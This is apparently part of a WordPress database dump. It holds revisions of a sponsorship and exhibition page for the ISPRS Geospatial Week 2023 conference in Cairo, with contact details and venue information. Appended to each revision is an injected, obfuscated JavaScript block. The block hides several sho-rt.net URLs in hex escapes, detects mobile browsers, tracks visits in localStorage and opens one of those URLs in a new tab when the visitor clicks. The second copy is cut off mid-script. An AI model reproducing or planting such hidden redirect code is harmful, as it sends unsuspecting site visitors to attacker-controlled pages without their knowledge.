sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</h5>\n<h5></h5>\n<h5>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</h5>\n<h5></h5>\n<h5>The GSW2023 Organizing Committee.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></h4>\n<p><strong>Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El- Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u> .</strong>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2930\" img_size=\"1600x2000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2022-10-26 13:31:38','2022-10-26 13:31:38','',2920,'https://gsw2023.com/?p=2932',0,'revision','',0),
(2933,1,'2022-10-26 14:30:44','2022-10-26 14:30:44','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</h5>\n<h5></h5>\n<h5>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</h5>\n<h5>of dedicated workshops. More information regarding ISPRS can be found at:</h5>\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\n<h5></h5>\n<h5>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</h5>\n<h5></h5>\n<h5>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</h5>\n<h5></h5>\n<h5>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</h5>\n<h5></h5>\n<h5>The GSW2023 Organizing Committee.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></h4>\n<p><strong>Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El- Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u> .</strong>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2930\" img_size=\"1600x2000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></p>\n<p><strong> (<u>https:/<a href=\"http://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc\">/www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc</a>=nav_hotel</u> <u>detail_undefined</u>)</strong></p>\n<h5></h5>\n<h5 style=\"text-align:justify; color:black;><strong>The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else 